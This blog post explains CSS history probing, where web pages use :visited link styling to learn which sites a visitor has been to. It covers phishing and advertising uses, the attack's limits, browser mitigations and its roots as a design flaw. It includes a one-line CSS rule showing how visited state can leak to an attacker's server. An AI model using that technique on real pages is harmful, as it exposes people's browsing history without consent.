CSS History Probing, or: "I know where you went last week"

Background
One of the interesting attacks which makes the rounds every few years concerns the ability of web pages to use CSS to detect whether or not certain URLs have been visited.  Given a sufficiently large set of URLs to probe, a website may be able to develop an interesting profile of where your browser has been.

You can try a simplistic demo of this here: CSS History Probing.  The demo should (see comments)  used to work in pretty much any browser.

Implications
The security and privacy implications of this design vulnerability are obvious, and clever folks are finding more and more ways to take advantage of it. 

It's been suggested that phishers could use this technique to determine where you bank and select the most appropriate phishing site when you visit their "uber" phishing page.  (Of course, if my inbox is any guide, most phishers are content to blast everyone with every phishing attempt).

At HITB2008, Jeremiah Grossman said his research showed that advertisers and marketers are the only folks using this trick broadly; when you visit CarCoA, for instance, they're probably very interested in knowing whether you're also shopping at CarCoB.  Similarly, a banner advertiser provider could show more relevant ads by probing for visits to a few top sites (e.g. sports, entertainment, news, etc) to determine a "good-enough" demographic profile of the viewer's age, location, and interests.

Beyond Evil.com and Madison Avenue, there are even some useful scripts that use this information leak in non-malicious ways.

Limitations
This vulnerability is subject to a number of limitations, the most important of which is that the attacker must correctly generate the exact URL that the user has visited.  So, for instance, an attacker can easily detect that you've visited Bing.com to perform a search, but it's much harder for him to detect what you searched for, because he would have to probe every possible search query (or at least, all queries he's interested in detecting).  Additionally, the information leakage is limited by the duration that the browser is configured to retain history, and other factors I'll cover in the next section.

Fixes and Mitigations
As with any vulnerability that has been around a while and has received lots of exposure, a great many "fixes" have been proposed.  Unfortunately, as is usually the case, most are non-starters for one reason or another.

  1. Disable scripting.  This isn't sufficient to block the attack; CSS rules can be written so that the attacker's server gets a unique request indicating the visited state.  (e.g. Link1 :visited { background: url(nonce); })
  2. Disable CSS.  This would work, but it would make the web pretty ugly.
  3. Disable Visited Link tracking entirely.  This would work, although it would entail a pretty significant user-experience penalty because the user could no longer see what sites had been visited.  There's an unsupported registry key available to IE8 users to disable Visited Links.  To do so, create a REG_SZ named Disable Visited Hyperlinks inside HKCU\Software\Microsoft\Internet Explorer\Settings\ with the value yes.
  4. Only allow Visited styling using rules that don't have detectable side-effects.  This is fairly restrictive, because if you allow any significant amount of styling (size, background image, font, etc) you can construct a page that detects that the rules have been applied.  This is the path that WebKit & Firefox announced they were taking in April 2010 and this is also the approach that IE9 Release Candidate uses.
  5. Disable Visited styling for cross-domain links.   This would work, although there's a performance penalty and a user-experience penalty; the user-experience at aggregation sites like SlashDot or Digg would be impacted.
  6. Partition the cache and visited links based on site of origin. This works, although there's a performance penalty and a user-experience penalty for doing so.  Folks at Stanford put together add-ons that show how this would work.
  7. Use your browser's privacy features.  If you set your browser history to Clear-on-Exit, or your history to expire regularly (see Tools / Options / Browsing History), you can scope down the duration that Visited Links are retained.  Better still, IE8's InPrivate Browsing feature blocks CSS visited link detection (Firefox 3.5's Private Browsing feature and Chrome 2's Incognito feature do the same).  

Visited Links are completely disabled while you’re InPrivate.  If you visit your “trusted” sites while InPrivate, those sites are not added to your history, so effectively a partition has been created:

  • If you visit trusted sites InPrivate, then that “trusted” history isn’t available to untrusted sites even when browsing outside of InPrivate. 
  • On the other hand, if you visit untrusted sites while InPrivate, then those sites will not be able to determine ANY of your browsing history using the Visited Links trick.

Origins - Vulnerable by Design
As I mentioned in my MiX09 talk, many browser security vulnerabilities arise from the complexity of the browser platform and the (sometimes unforeseen) interactions of the basic browsing technologies (JavaScript, CSS, DOM, HTTP, extensibility, etc).  In this case, the design of CSS contains a pretty straightforward vulnerability which allows for detection of which links have been visited and which have not.  

The architects of CSS clearly had the best of intentions, as highlighting visited links can help users more easily navigate a site.  Unfortunately, this useful feature had some unexpected consequences when exposed to clever web developers in the real world. 

Trying to correct design vulnerabilities after the development and deployment of products based on the design is incredibly difficult, because compatibility and user-experience regressions inevitably ensue. As a result, design vulnerabilities often remain unaddressed or partially mitigated for years, as has happened in this case.

As the web platform grows more powerful, it's critical that architects and browser developers detect and remediate design problems before standards are ratified.

-Eric